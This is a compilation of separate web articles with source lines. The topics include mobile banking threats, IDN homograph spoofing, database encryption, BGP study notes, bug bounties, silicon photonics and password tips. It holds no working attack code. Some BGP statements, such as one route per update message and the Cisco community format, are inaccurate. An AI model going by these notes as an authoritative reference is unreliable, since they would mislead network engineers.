1. New methods for securing browser communications with their customers on both PC and mobile handset platforms
2. Providing end-user education on safe online practices
3. Implementing tough authentication standards

Amit Klein is a malware researcher and CTO of secure browsing service provider Trusteer.
Source: http://www.banktech.com/how-to-stem-the-tide-of-mobile-attacks/a/d-id/1294473
In a cursor program, when does the SQL statement actually execute? If I update a row during the fetch step and then display it on the next line, I do not see the updated value. But after closing the cursor, reopening it and displaying the row again, I do get the updated value. So when is the update happening?

Joined: 13 Jun 2007 Posts: 632 Location: Wisconsin

Here is an excellent article describing the history of cursors in DB2. It describes how sometimes you are working not directly with the database, but with a materialized result set. So your cursor may or may not read directly from the table, depending on how the optimizer decided to execute it.
Source: http://ibmmainframes.com/about22697.html
Forwarded from: William Knowles <wkat_private> http://www.sciam.com/2002/0602issue/0602scicit5.html June 2002 By: Wendy M. Grossman Is this the Web address of tomorrow: ? At the moment, non-Latin alphabets and scripts are not compatible with ASCII, the lingua franca of the Internet also known as plain text. But as of March only 40 percent of the 561-million-strong global online population were native English speakers, according to online marketing firm Global Reach. Work has been proceeding for some time, therefore, to internationalize the system that assigns domain names (sciam.com, for example) to the dotted clumps of numbers that computers use (such as 188.8.131.52). The technical side of things has been managed by the Internationalized Domain Name Working Group of the Internet Engineering Task Force (IETF). In April, VeriSign, the single largest registrar of domain names, claimed to have registered about a million international names. But turning Web addresses into a multilingual forum may open the door to a dangerous new hazard--hackers could set up fake sites whose domain names look just like the ASCII version. One example is a homograph of microsoft.com incorporating the Russian Cyrillic letters "c" and "o," which are almost indistinguishable from their Latin alphabet counterparts. The two students who registered it, Evgeniy Gabrilovich and Alex Gontmakher of the Technion-Israel Institute of Technology in Haifa did so to make a point: they suggest that a hacker could register such a name and take advantage of users' propensity to click on, rather than type in, Web links. These fake domain names could lead to a spoof site that invisibly captures bank account information or other sensitive details. In their paper, published in the Communications of the ACM, they paint scary, if not entirely probable, scenarios. For instance, a hacker would be able to put up an identical-looking page, hack several major portals to link to the homographed site instead of the real one, and keep it going unnoticed for perhaps years. On a technical level, homograph URLs are not confusing. International domain names depend on Unicode, a standard that provides numeric codes for every letter in all scripts worldwide. And at its core, the internationalization of the domain name system is a veneer: the machines underneath can still only read ASCII. According to the proposed standard, the international name will be machine-translated at registration into an ASCII string composed of an identifying prefix followed by two hyphens followed by a unique chunk of letters and numbers: "iesg--de-jg4avhby1noc0d," for example. This string would be translated back into Unicode and compared with the retranslation of the original. So right now anyone using a standard browser can easily see the difference between an internationalized domain name and an ordinary one. This situation, however, is temporary. Technical drafts by the IETF state that users should not be exposed to the ugly ASCII strings, so increasingly users will have little way of identifying homographs. Computer scientist Markus G. Kuhn of the University of Cambridge notes that for users to be sure they are connected to the desired site, they will have to rely on the secure version of the Web protocol (https) and check that the site has a matching so-called X.509 certificate. "That has been common recommended practice for electronic banking and commerce for years and is not affected by Unicode domain names," Kuhn observes. 
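To make the homograph problem described above concrete, here is a small Python sketch (illustrative only; it uses Python's built-in punycode codec as a stand-in for the full internationalized-name encoding, whose identifying ASCII prefix the article discusses):

```python
# The lookalike label mixes in Cyrillic letters that render almost
# identically to the Latin "c" and "o", as in the article's example.
latin     = "microsoft"
lookalike = "mi\u0441r\u043esoft"   # U+0441 CYRILLIC SMALL LETTER ES, U+043E CYRILLIC SMALL LETTER O

print(latin == lookalike)                    # False: different code points
print([hex(ord(ch)) for ch in lookalike])    # the Cyrillic code points stand out

# Under the hood the two labels also map to different ASCII strings, even
# though a user clicking a link would have little chance of noticing.
print(latin.encode("punycode"))
print(lookalike.encode("punycode"))
```

The ASCII encodings differ, but as the article notes, users are not expected to see those strings, which is exactly why the visual similarity matters.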
Certification agencies (which include VeriSign) ensure that encoded names are not misleading and that the registration corresponds with the correct real-world entity. But experience shows that the Internet's majority of unsophisticated users "are vulnerable to all kinds of simple things because they have no concept of what's actually going on," explains Lauren Weinstein, co-founder of People for Internet Responsibility. Getting these users to inspect site certificates is nearly impossible.

Weinstein therefore thinks that a regulatory approach will be necessary to prohibit confusing names. Such an approach could be based on the current uniform dispute resolution procedure of the Internet Corporation for Assigned Names and Numbers (ICANN), the organization that oversees the technical functions of handing out domain names. But it will require proactive policing on the part of the registrars, such as VeriSign, something they have typically resisted.

But are international domain names even necessary? Kuhn, who is German, doesn't think so: "Familiarity with the ASCII repertoire and basic proficiency in entering these ASCII characters on any keyboard are the very first steps in computer literacy worldwide." Internationalizing names might succeed only in turning the global network into a Tower of Babel.
Source: http://lists.jammed.com/ISN/2002/05/0164.html
Encrypting a database does have a superficial appeal. The rise of native encryption technologies, embedded into the database by the various vendors, has made encryption easier today than ever before. By protecting your data and associated objects, intellectual property can be preserved and the sun will always shine. Or will it?

Microsoft SQL Server

Stored procedures in SQL Server enable a developer to encapsulate functionality into a block of code, which, in turn, can be optimised by the database for very fast processing. The code in a stored procedure can represent a business process or other logic that can easily be commercially sensitive. By default, SQL Server will take this code and store it in a system table called SysComments. If a user can access this table, which is not necessarily difficult, the code can be seen in plain text and therefore read and copied.

To prevent this from happening it is possible to encrypt a SQL Server stored procedure using the WITH ENCRYPTION clause. This will encrypt the logic in the SysComments system table and make the stored procedure indecipherable. Note that once a stored procedure has been encrypted, neither the object owner nor the systems administrator can recover the plain-language code, so it is imperative that a copy of the unencrypted stored procedure code is kept in a safe place.

Well, that is the official line. The harsh reality is that the internet is awash with third-party tools that can decrypt SQL Server stored procedures for $100 or so. Does this make the encryption of SQL Server stored procedures a waste of time? Probably not, as encryption will deter the casual observer. ISVs should incorporate suitable clauses in their End User Licence Agreement that forbid reverse engineering of code, and I hope the courts will take a dim view of someone trying to break open your intellectual property. Ultimately if someone wants to get your code they will, but why not make it a little more difficult for them?

Oracle

This vendor supports the protection of PL/SQL code using a tool called the PL/SQL Wrap Utility. If you wrap code in Oracle it can still be treated the same as unwrapped code—it is just as portable. There are some limitations to the Oracle Wrap Utility. Specifically, names of variables, columns, tables and string and number literals are not hidden by the tool and these will remain in plain view for others to see, but at least the code is hidden. Running the Wrap Utility is done from the command line; the file to be wrapped is simply named alongside the name of the new wrapped file.

Database Encryption—the downside

Like most things in IT, there is always a negative to a positive. If encryption is so great, why don't developers use it everywhere—basically encrypt everything unless there is a good reason not to? Unfortunately using encryption can both increase the volume of your database and decrease your system performance. Some encryption algorithms used to encrypt data work on a fixed block size architecture. If the size of the data to be encrypted does not match these block sizes then some algorithms will pad out the blocks with wasted space to make them fit—and bloat your database. A good example is the use of wrapping in an Oracle database. The size of a wrapped procedure can be up to three times the size of the same code unwrapped, which in turn will increase the time it takes to install these procedures.

Performance can be massively affected if you are using indexed columns that are encrypted.
Often this data is the type that makes sense to encrypt as it may be the most sensitive, such as a credit card number. The down side is that when you are adding or changing data the database will need to battle with the encryption algorithm to make the changes. No one ever said database security was easy and a win-win. There will always be instances when the technology that supports the encryption will get in the way of the business objectives of the database. In this case you will need to make an informed view as to what if any data is encrypted in the database.
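To make the indexed-column point concrete, here is a toy Python sketch (illustrative only, using the third-party cryptography package's Fernet recipe as a stand-in cipher; it is not how SQL Server or Oracle implement column encryption, and some products use deterministic encryption precisely to keep equality lookups working):

```python
from cryptography.fernet import Fernet   # third-party package, used only as a stand-in cipher

f = Fernet(Fernet.generate_key())

# Plaintext card numbers compare and sort naturally, so a B-tree index can
# seek straight to a value or a range.
cards = ["4111-0001", "4111-0002", "4111-0003"]

# Randomized encryption destroys equality and ordering at the ciphertext level:
# encrypting the same value twice yields two different tokens.
print(f.encrypt(cards[0].encode()) == f.encrypt(cards[0].encode()))   # False

# So a lookup on the encrypted column cannot use the index; every row must be
# decrypted before the predicate can be evaluated.
encrypted_rows = [f.encrypt(c.encode()) for c in cards]
matches = [row for row in encrypted_rows
           if f.decrypt(row).decode() == "4111-0002"]
print(len(matches))   # 1
```

The extra decrypt-per-row work is the kind of overhead the article warns about when deciding which columns are worth encrypting.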
Source: http://www.bloorresearch.com/analysis/is-database-encryption-worth-it/
BGPv4 is an Exterior Gateway Protocol (EGP) and was introduced in 1995 in RFC 1771; it is now defined in RFC 4271. The major difference between earlier versions of BGP and v4 is that BGPv4 is classless and supports CIDR. BGP is primarily used to propagate and advertise public networks across the Internet. A large majority of Internet communications is made possible by BGP.

Autonomous System (AS) numbers are assigned to companies wanting to advertise their networks/IP ranges to the Internet. AS numbers are controlled and assigned by the Internet Assigned Numbers Authority (IANA) to Regional Internet Registries (RIRs), who then assign specific AS numbers to ISPs or companies requesting an AS number.

Unlike IGPs, BGP is connection based and uses TCP port 179 to communicate with peers. Since TCP is used, routing via an IGP or static routes must be in place before BGP peering can establish. Since each BGP node relies on downstream neighbors to pass along routes, BGP is considered a Distance Vector protocol. Each node makes route calculations based on the advertised routes from BGP peering neighbors. Unlike other distance vector protocols, BGP uses a route's AS_PATH to determine best path selection for each route. For this reason BGP is commonly called a Path Vector protocol.

Packet Types/Neighbor States

Open Message
Sent after the TCP connection is established. This message is used to identify the sending router and to specify operational parameters.
- Open message includes:
  - BGP version number
  - AS number
  - Hold time
  - BGP ID (highest loopback IP, or physical IP if no loopback exists)
  - Optional Parameters

Keepalive Message
Sent once a router accepts the parameters in the neighbor's open message. Keepalives are then sent periodically.

Update Message
Sent when route changes are made, which include new routes, withdrawn routes or both.
- Update message includes:
  - Network Layer Reachability Information (NLRI) - used to advertise new routes
  - Path Attributes
  - Withdrawn Routes
- Note: each update message describes only a single BGP route. A new update message must be sent for each route being added.

Notification Message
Sent whenever an error is detected between peers. Notification messages always cause the BGP connection to close.

BGP Neighbor States
- Idle
- Connect
- Active
- Open Sent
- Open Confirm
- Established

Idle State
- BGP always begins in the idle state, in which it refuses all incoming connections. When a start event occurs the BGP process initializes and starts establishing a BGP connection with its neighbor.
- An error causes BGP to transition back to the idle state. The router can then try to automatically issue another start event. Too many attempts of a start event can cause flapping, so limitations should be set to limit the number of retries.

Connect State
- In this state BGP is waiting for the TCP connection to be completed. If the connection is successful then an Open message is sent and the router transitions to the OpenSent state.
- If the TCP connection is unsuccessful then BGP continues to listen for TCP connection attempts from the neighbor, resets its ConnectRetry timer and transitions to the Active state.

Active State
- BGP is trying to initiate a TCP connection with a neighbor.

OpenSent State
- An open message has been sent and BGP is waiting to receive an open message from its neighbor.
- If there are errors in the open message (incorrect AS number or version etc.) an error notification is sent and BGP transitions back to the idle state. If no errors are seen then a keepalive message is sent.
OpenConfirm State
- The BGP process is waiting for a keepalive or notification from a neighbor.
- If a notification is received or a TCP disconnect is received, the state transitions to idle. If the hold timer expires, an error is detected, or a stop event occurs, a notification is sent and the BGP connection is closed, changing the state to idle.

Established State
- The BGP connection is fully established with a neighbor and update messages are exchanged with the new neighbor.
- If any errors are found or the keepalive timer times out, a notification message is sent and BGP is transitioned back to idle.

Path attributes are what allow BGP administrators to control and manipulate routing updates among peers. BGP path attributes allow you to control what routes are preferred, what routes are advertised to peers and what routes are added to the local routing table.

Path attributes fall into 1 of 4 categories:
- Well-known Mandatory - must be included in all updates
- Well-known Discretionary - must be supported but may or may not be included in updates
- Optional Transitive - not required but peer must accept the attribute
- Optional Nontransitive - not required and can be ignored

- ORIGIN - Specifies the origin of the routing update.
  - IGP, EGP, Incomplete (preferred in this order)
  - Routes learned from redistribution carry Incomplete origins because BGP cannot tell where the route originated.
- AS_PATH - Uses a sequence of AS numbers to describe the AS path to the destination.
  - When a BGP speaker advertises a route to an EBGP peer it prepends its AS number to the AS_PATH. When advertising to iBGP peers the AS is not added.
- NEXT_HOP - Describes the next-hop router on the path to the advertised destination. The NEXT_HOP attribute is not always the address of the neighboring router. The following rules apply:
  - If the advertising and receiving routers are in different ASs (external peers), the NEXT_HOP is the IP of the advertising router's interface.
  - If the advertising and receiving routers are in the same AS (internal peers), and the route refers to an internal destination, the NEXT_HOP is the IP of the neighbor that advertised the route.
  - If the advertising and receiving routers are in the same AS (internal peers), and the route refers to a route in a different AS, the NEXT_HOP is the IP of the external peer from which the route was learned.
- LOCAL_PREF - Used only in updates between iBGP peers. It is used to communicate a BGP router's degree of preference for an advertised route.
  - When multiple routes to the same destination are received from different iBGP peers, the LOCAL_PREF is used to determine the best path.
  - Highest value takes preference.
  - Default value is 100.
- ATOMIC_AGGREGATE - Used to alert downstream routers that a loss of path information has occurred due to summarization of subnets.
  - If an update is received with the ATOMIC_AGGREGATE attribute set, that BGP speaker cannot update the route with more specific information. Also, the attribute must be set when passing the route to other peers.
- AGGREGATOR - Provides information about where the aggregation was performed by including the AS and router ID of the originating aggregating router.
- COMMUNITY - Used to simplify policy enforcement by setting a community value.
  - 4 octets are used (AA:NN) where AA represents the AS and NN is an administratively set value. An example would be 65001:70.
- Cisco uses NN:AA instead and "ip bgp-community new-format" must be set to use AA:NN
- Reserved COMMUNITY values used for policy enforcement:
- INTERNET - all routes belong to this community by default and are advertised freely
- NO_EXPORT - routes cannot be advertised to eBGP peers or advertised outside the confederation
- NO_ADVERTISE - routes cannot be advertised to any peer (eBGP or iBGP)
- LOCAL_AS - (aka NO_EXPORT_SUBCONFED per RFC 1997) routes cannot be advertised to eBGP peers, including peers in other ASs within the same confederation
- MULTI_EXIT_DISC (MED) - used to influence routes entering the local AS.
- Carried in eBGP updates, this attribute allows an AS to inform a directly connected AS of its preferred ingress points.
- Lowest value is preferred.
- Default value is 0
- MED cannot be passed beyond the directly connected AS. For that, the AS_PATH must be manipulated.
- By default MEDs are not compared if two routes to the same destination are received from two different ASs
- ORIGINATOR_ID - 32-bit value created by route reflectors to prevent routing loops.
- The value is the RID of the originating router of a route in the local AS. If a BGP speaker sees its RID in the ORIGINATOR_ID attribute of a received update, it knows a loop has occurred and ignores the update.
- CLUSTER_LIST - A sequence of route reflection cluster IDs used by route reflectors to prevent routing loops.
- CLUSTER_LIST consists of all cluster IDs a specific route has passed through. If a route reflector sees its own cluster ID in this attribute, it knows a loop has occurred and ignores the update.
- Administrative Weight - Cisco-specific BGP parameter assigned to help prioritize outbound routes.
- Local to the router only and not communicated out
- Weight is between 0 and 65,535. The higher the weight the more preferable the route
- Weight is considered before all other characteristics
- Routes generated by the local router = 32,768
- Routes learned from a peer = 0
- AS_SET - Used to prevent loops (just like AS_PATH) by listing all ASs traversed (not listed in order) in the route. Used when an aggregate summarizes a route and starts the AS_PATH over. AS_SET is included (with all original ASs) so routers can determine if a loop has occurred.
- When AS_SET is included, an ATOMIC_AGGREGATE does not have to be included with the aggregate.
- Updates are sent when ASs change within an aggregate and AS_SET is included. Without the AS_SET no update would be sent, since it's an aggregate.

Attribute Order of Preference
- Administrative Weight (Cisco only) - Highest wins
- LOCAL_PREF - Highest wins
- Locally originated routes preferred
- AS_PATH - Shortest path wins
- Origin code - Lowest wins
- MED - Lowest wins
- eBGP > confederation eBGP > iBGP routes
- BGP NEXT_HOP - Lowest IGP metric to next hop wins
- BGP Router ID - Lowest wins

(A short illustrative comparison using these attributes appears after the eBGP example below.)

eBGP and iBGP

External BGP (eBGP) is used to set up BGP peering among peers in different autonomous systems. eBGP peering is most common among ISPs and their customers. ISPs also establish peering points with other service providers via eBGP peering. When an eBGP peer advertises routes to its neighboring peer, the AS number is prepended to the AS_PATH. If a router receives the same route from multiple BGP peers, then the route with the shortest AS_PATH is chosen and added to the routing table. Routers then advertise only the best route to other BGP peers. An example AS_PATH would be 65001 65010 65111. Using this AS_PATH we can see the route was originated in AS 65111, then advertised to AS 65010, and then advertised again to AS 65001.
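To make the order of preference above concrete, here is a minimal sketch of how a router might compare two candidate routes to the same prefix. It is an illustration only, not an actual BGP implementation; the attribute names, the example values and the simplified tie-breaking are assumptions made for the example.

```python
# Illustrative only: simplified BGP best-path comparison following the order of
# preference described above (weight, LOCAL_PREF, AS_PATH length, origin, MED,
# then router ID as a final tie-breaker).

ORIGIN_RANK = {"IGP": 0, "EGP": 1, "Incomplete": 2}  # lower is preferred

def path_key(route):
    """Build a sort key so that the 'best' route sorts first."""
    return (
        -route["weight"],              # highest weight wins (Cisco only)
        -route["local_pref"],          # highest LOCAL_PREF wins
        len(route["as_path"]),         # shortest AS_PATH wins
        ORIGIN_RANK[route["origin"]],  # IGP < EGP < Incomplete
        route["med"],                  # lowest MED wins
        route["router_id"],            # lowest router ID wins (string compare as a simplification)
    )

def best_path(candidates):
    return min(candidates, key=path_key)

# Example: two routes to the same prefix learned from different peers.
routes = [
    {"prefix": "203.0.113.0/24", "weight": 0, "local_pref": 100,
     "as_path": [65001, 65010, 65111], "origin": "IGP", "med": 0,
     "router_id": "10.0.0.2"},
    {"prefix": "203.0.113.0/24", "weight": 0, "local_pref": 200,
     "as_path": [65020, 65111], "origin": "IGP", "med": 0,
     "router_id": "10.0.0.3"},
]

print(best_path(routes)["as_path"])  # LOCAL_PREF 200 wins: [65020, 65111]
```

A real implementation also checks whether the route was locally originated and prefers eBGP over iBGP paths, as listed above; the sketch keeps only the attributes introduced so far.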
To avoid loops, if a BGP peer sees its own AS number in the AS_PATH then it knows a loop would occur and discards the route.

Internal BGP (iBGP) is used to set up BGP peering among peers in the same AS. Usually iBGP peers fall inside the same company or organization. iBGP is usually seen in multihomed scenarios and in transit ASs, which are used to pass BGP routes from one AS to another. When routes are advertised between iBGP peers the AS_PATH is not changed, since the routes stay within the same AS. The AS number is not prepended to the AS_PATH until a route is advertised to an eBGP peer. Since the AS_PATH is used by BGP to protect against routing loops, iBGP peers are unable to tell if a route advertised from another iBGP peer will cause a loop. To solve this issue, iBGP peers do not advertise routes learned from iBGP peers to other iBGP peers, thus providing loop avoidance within an AS.

The problem with the iBGP loop avoidance rule is that BGP routes learned on one end of an AS are not fully propagated to routers on the other end of the AS. One of three solutions must be used to fully propagate BGP routes across the AS.
- All iBGP peers must be fully meshed and peer with all other iBGP routers within the AS.
- By fully meshing all iBGP peers, each BGP router will receive updates from all routers in the AS
- Unfortunately this is not always possible and does not scale with a growing network
- Synchronization must be used and BGP routes must be redistributed into the IGP so the routes can be advertised across the AS.
- Most IGPs are unable to handle large BGP tables, much less the full Internet BGP table.
- Route reflectors must be established.

Route reflectors are defined in RFC 4456 and used primarily in large autonomous systems to propagate routes to all BGP peers without the use of a fully meshed AS. In larger networks it is impractical to set up full mesh peering between all peers within the AS. Route reflection provides a means to centralize iBGP peering to a single router or group of routers known as route reflectors. All routers (known as clients) within the AS peer with a centralized router (the route reflector or server). Normally iBGP routers do not advertise routes learned from iBGP peers internally, but route reflectors are the exception to this rule. Route reflectors advertise routes to both iBGP and eBGP peers, thus allowing iBGP-learned routes to propagate to all peers within an AS.

A group of route reflector(s) and clients is known as a cluster. If multiple route reflectors exist within a single cluster then the cluster ID must be defined on each route reflector. The key benefit to using route reflection over other techniques such as confederations is that route reflection does not need to be supported by all routers in the cluster or AS. Route reflection just needs to be supported on the route reflectors or servers. Clients do not need any additional configuration to join a cluster. Clients are specified on each route reflector servicing the cluster.
- Client peers - routers that are members of the cluster.
- Non-client peers - routers that are not members of the cluster

Route reflectors treat each route differently depending on how the route is received. There are three rules followed by route reflectors (a short illustrative sketch of these rules appears at the end of this article):
- Locally originated routes and routes received from eBGP neighbors are propagated to all BGP peers (internal and external).
- Routes received from a client are propagated to all BGP peers (internal and external).
- Routes received from an iBGP non-client peer are propagated to all eBGP peers and all iBGP client peers.

Route Reflection Design

When designing your BGP network for route reflection you need to consider the location of the route reflectors in relation to all client peers. Generally, routers that are central to the network and able to peer with all neighbors should be used as route reflectors. For example, in a star topology the hub router would be used as the route reflector. If it is not possible to have a single centralized route reflector then multiple route reflectors should be used. Multiple route reflectors should also be considered for redundancy in the event of a router failure. For large networks you might also consider breaking your network down into multiple clusters. Route reflectors can be clients of other route reflectors, which allows you to set up a hierarchical network of clusters. A good example would be to create a separate cluster for each city or geographical area and then make each route reflector a client of the backbone cluster. Route reflection can also be used alongside confederations to improve control over routing updates across the network.
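As a closing illustration of the three route-reflector propagation rules listed above, the following sketch encodes them as a single function. The peer-type labels are assumptions made for the example; this is not how a production BGP implementation is structured.

```python
# Illustrative only: the three route-reflector propagation rules described above.
# source_peer_type describes where the route came from: "local" (originated here),
# "ebgp", "client" (iBGP client), or "non_client" (iBGP non-client).
# Returns the set of peer groups that receive the route.

def reflect(source_peer_type):
    if source_peer_type in ("local", "ebgp"):
        # Rule 1: locally originated and eBGP-learned routes go to every peer.
        return {"ebgp", "client", "non_client"}
    if source_peer_type == "client":
        # Rule 2: routes from a client are reflected to all peers.
        return {"ebgp", "client", "non_client"}
    if source_peer_type == "non_client":
        # Rule 3: routes from an iBGP non-client go only to eBGP peers and clients.
        return {"ebgp", "client"}
    raise ValueError("unknown peer type: " + source_peer_type)

print(reflect("non_client"))  # {'ebgp', 'client'} - not reflected back to non-clients
```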
Silicon photonics is in the spotlight again, being pitched by researchers at the University of Colorado Boulder, the Massachusetts Institute of Technology and Micron Technology Inc. as a potential Moore’s Law extender. The technology of silicon photonics refers to using light, instead of electrical wires, to enable silicon-based transistors to communicate on a single chip. The technique could lay the groundwork for computers that are remarkably fast, cost-effective and energy-efficient. The project is headed up by CU-Boulder researcher Milos Popovic, an assistant professor of electrical, computer and energy engineering. Popovic and his team developed the technique, which employs two different optical modulators, structures that detect electrical signals and translate them into optical waves. The major benefit to this particular method is that it can be fabricated with standard CMOS processes already in use by the industry. The approach addresses the main stumbling blocks to current transistor designs, energy and heat. Because it takes a lot of electricity to turn transistors on and off, there is excessive heat buildup. The heat buildup means that additional electricity must be expended to cool the device. Furthermore, as transistor sizes shrink, the number of wires occupying such a small area of space leads to “cross-talk.” The multicore/manycore design was essentially a workaround to this problem but this technique is limited by communication between microprocessor cores, which is also energy-intensive. Optical communications circuits are dramatically more energy efficient than electrical wires. A single fiber-optic strand can carry a thousand different wavelengths of light at the same time. This allows multiple communications to take place simultaneously in a small space with no cross talk. The Internet and the majority of phone lines already rely on optical communications technology, but in order to be economically feasible for microprocessors, vendors need to be able to use the same fabrication process and foundries that produce the current generation of microprocessors. This integration of photonics and electronics is what’s necessary to get buy-in from the microprocessor industry, according to Popovic. “In order to convince the semiconductor industry to incorporate photonics into microelectronics you need to make it so that the billions of dollars of existing infrastructure does not need to be wiped out and redone,” he added. Popovic and his colleagues at MIT have demonstrated that this is indeed possible. Two papers published in August in the journal Optics Letters (http://dx.doi.org/10.1364/OL.38.002729 and http://dx.doi.org/10.1364/OL.38.002657) with CU-Boulder postdoctoral researcher Jeffrey Shainline as lead author describe an optical modulator that is compatible with a current manufacturing process known as Silicon-on-Insulator Complementary Metal-Oxide-Semiconductor, or SOI CMOS. This is the same process used to manufacture cutting-edge multicore microprocessors such as the IBM Power7 and Cell, which is used in the Sony PlayStation 3. The research team also detail a second optical modulator that could be created with another popular chip-manufacturing process, called bulk CMOS, currently used for memory chips and most high-end microprocessors.
Ethical Hacking and Security

Ethical hacking, or authorized virtual attacks on information systems designed to uncover vulnerabilities, speaks to Chinese war authority Sun Tzu’s ancient aphorism about understanding one’s enemy. “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle,” he said. Because having insights into the tactics and strategies of one’s opposition is such an effective means to defend against them, ethical hacking methodologies have been working their way into more and more IT security training and certification programs. One of these is the International Council of E-Commerce Consultants’ (EC-Council) Certified Ethical Hacker (CEH) credential. In this month’s Security community feature, Sanjay Bavisi and Sangeetha Thomas of the EC-Council discuss the CEH program as well as ethical hacking in general.
Like viruses and spyware that can infect your PC, there are a variety of security threats that can affect mobile devices. We divide these mobile threats into several categories: application-based threats, web-based threats, network-based threats and physical threats.

Downloadable applications can present many types of security issues for mobile devices. “Malicious apps” may look fine on a download site, but they are specifically designed to commit fraud. Even some legitimate software can be exploited for fraudulent purposes. Application-based threats generally fit into one or more of the following categories:
- Malware is software that performs malicious actions while installed on your phone. Without your knowledge, malware can make charges to your phone bill, send unsolicited messages to your contact list, or give an attacker control over your device.
- Spyware is designed to collect or use private data without your knowledge or approval. Data commonly targeted by spyware includes phone call history, text messages, user location, browser history, contact list, email, and private photos. This stolen information could be used for identity theft or financial fraud.
- Privacy Threats may be caused by applications that are not necessarily malicious, but gather or use more sensitive information (e.g., location, contact lists, personally identifiable information) than is necessary to perform their function.
- Vulnerable Applications are apps that contain flaws which can be exploited for malicious purposes. Such vulnerabilities allow an attacker to access sensitive information, perform undesirable actions, stop a service from functioning correctly, or download apps to your device without your knowledge.

Because mobile devices are constantly connected to the Internet and frequently used to access web-based services, web-based threats pose persistent issues for mobile devices:
- Phishing Scams use email, text messages, Facebook, and Twitter to send you links to websites that are designed to trick you into providing information like passwords or account numbers. Often these messages and sites are very difficult to distinguish from those of your bank or other legitimate sources.
- Drive-By Downloads can automatically download an application when you visit a web page. In some cases, you must take action to open the downloaded application, while in other cases the application can start automatically.
- Browser exploits take advantage of vulnerabilities in your mobile web browser or software launched by the browser such as a Flash player, PDF reader, or image viewer. Simply by visiting an unsafe web page, you can trigger a browser exploit that can install malware or perform other actions on your device.

Mobile devices typically support cellular networks as well as local wireless networks (WiFi, Bluetooth). Both of these types of networks can host different classes of threats:
- Network exploits take advantage of flaws in the mobile operating system or other software that operates on local or cellular networks. Once connected, they can install malware on your phone without your knowledge.
- Wi-Fi Sniffing intercepts data as it is traveling through the air between the device and the WiFi access point. Many applications and web pages do not use proper security measures, sending unencrypted data across the network that can be easily read by someone who is grabbing data as it travels.
Mobile devices are small, valuable and we carry them everywhere with us, so their physical security is also an important consideration. Lost or Stolen Devices are one of the most prevalent mobile threats. The mobile device is valuable not only because the hardware itself can be re-sold on the black market, but more importantly because of the sensitive personal and organizational information it may contain.
The idea that you might pay someone else to keep quiet about a vulnerability while you fix it may seem a bit backward to some in computer security. It would also seem to invite attacks on infrastructure. It’s no surprise, then, that many companies with technological products don’t have bug bounties. A bug bounty is a fee that is paid out whenever a hacker discovers a legitimate bug and co-ordinates with the company in order to receive the fee rather than selling the exploit or announcing it to the world. It’s a technique that has come into the public spotlight by being implemented at such prestigious places as Facebook and Google. But WHY? Why does it work? For many hackers, the security vulnerability is the means and the end — that is, they hack in order to find a security vulnerability and once one is found, they know that the service is vulnerable. Some hackers inevitably choose to sell these or trade these in underground markets, but many wish to see them fixed (perhaps the hacker uses the service or understands the potential for damage should it be abused). Many will then attempt to contact the company and disclose the vulnerability. Should the company drag its feet, or if the hacker is feeling particularly ornery, the vulnerability will be publicly disclosed (typically referred to as a “grey hat” method of disclosure). Having a bug bounty program lets computer security folks know:
- You understand security processes and the motives behind finding vulnerabilities
- That your company is dedicated to fixing the problem
- That you won’t shoot the messenger or try to stifle them
- That they can earn more respect and money by working WITH you than AGAINST you
It’s a psychological change that can help garner you more security and more respect in the security community as an organization that is dedicated to secure software/hardware. That way you won’t end up with Anonymous trying to wage Internet battle with your company. In the end it’s easier to pony up cash for vulnerabilities and fix them before they become security headaches or, worse, go unnoticed for long periods of time while they are used in advanced attacks. Encourage the behavior you want to see in the security community by implementing a bounty program of your own. Companies like Facebook and Google have already handed out tens of thousands of dollars for their bug bounty programs at between $500 and $1337 a pop.
Schoolchildren in London will be carrying more than just their books – they will now carry IoT sensors to measure air pollution in the area. Children and teachers from East Barnet School in North London have been fitted out with sensors that will collect and process air pollution data from both inside the classroom and on routes to and from school. The 16 children and teachers have been given CleanSpace Tags, portable air pollution sensors created by Drayson Technologies. The initiative makes East Barnet School one of the first schools in London to accurately measure and address the issue of air pollution by mapping data in real time.

IoT sensors and a real-time heat map

Drayson Technologies has partnered with Sustrans on the project alongside teachers to set up the 16 CleanSpace Tags, ten of which will also be placed inside the school to monitor indoor pollution levels. The carbon monoxide data collected from the tags will be fed into a time-lapse heat map that will show the pollution levels in real time. The findings will be used to provide a clear picture of air pollution in and around the school. The data collected from the IoT sensors will show the times of day that pollution levels are worst, and will become the first step to informing changes that can be made to overcome unnecessary pollution. On top of this, the results will be used to provoke change in how students and teachers travel to and from school and to promote sustainable modes of transport. Lord Drayson, chairman and CEO of Drayson Technologies, said that until now we have been unable to get a detailed understanding of what the air quality is like in, and around, our schools. “This project will not only enable us to see how much pollution these pupils are exposed to, it will help us identify ways we can reduce this by addressing behaviour that might be contributing to pollution levels,” he said. Stuart Owen, head of Science at East Barnet School, said the project would “enable us to understand the quality of the air inside, and around our school, and help us to devise a strategy to ensure our pupils have a minimal exposure to pollution.” Emanuele Angelidis, CEO of Breed Reply, told Internet of Business that there are a lot of solutions emerging that are “designed to help governments and big business reduce pollution and achieve environmental targets, as well as maximise efficiency.” “Rather than simply selling hardware such as sensors it will be the long-term services – data management and analysis – that they offer to customers that will be profitable,” he said.
TORONTO, ONTARIO--(Marketwired - Oct. 8, 2013) - October is Cyber Security Awareness Month, an international effort to educate consumers about cybercrime, and the Canadian Bankers Association (CBA) is reminding Canadians about what banks are doing to enhance cyber security and encouraging Canadians to bank safe and foil the fraudsters.

Banks have extensive security measures in place to protect their customers from fraudulent activity in their bank and credit card accounts, including monitoring transactions looking for unusual activity, verification questions to ensure that it is the customer using online banking, and moving to more secure chip and PIN (personal identification number) debit and credit cards. These efforts have been able to prevent criminal activity and help Canadians safely do their banking and pay for purchases.

"There are also important and simple steps that customers need to take to prevent fraud, and one of the most important things is to choose secure PINs and passwords," said Maura Drew-Lytle, Director of Communications at the Canadian Bankers Association. "This is a requirement set out in your banking agreements and if customers have taken the appropriate steps, then they will be protected from fraud losses by the banks' zero liability policies."

Tips on choosing secure online passwords and PINs

Each bank will have its own requirements about choosing secure passwords and PINs, so it is best to check with your bank's online access agreement, bank account agreement or credit cardholder agreements, but there are some general guidelines to keep in mind (a simple illustrative check based on these guidelines appears after the tips below). When choosing online passwords, verification questions and credit and debit card PINs, avoid choosing something that would be easy to guess or information that could be obtained by others. You must not use:
- Your name or that of a close relative
- Your birth date, year of birth, telephone number or address, or that of a close relative
- Your bank account, debit card or credit card number
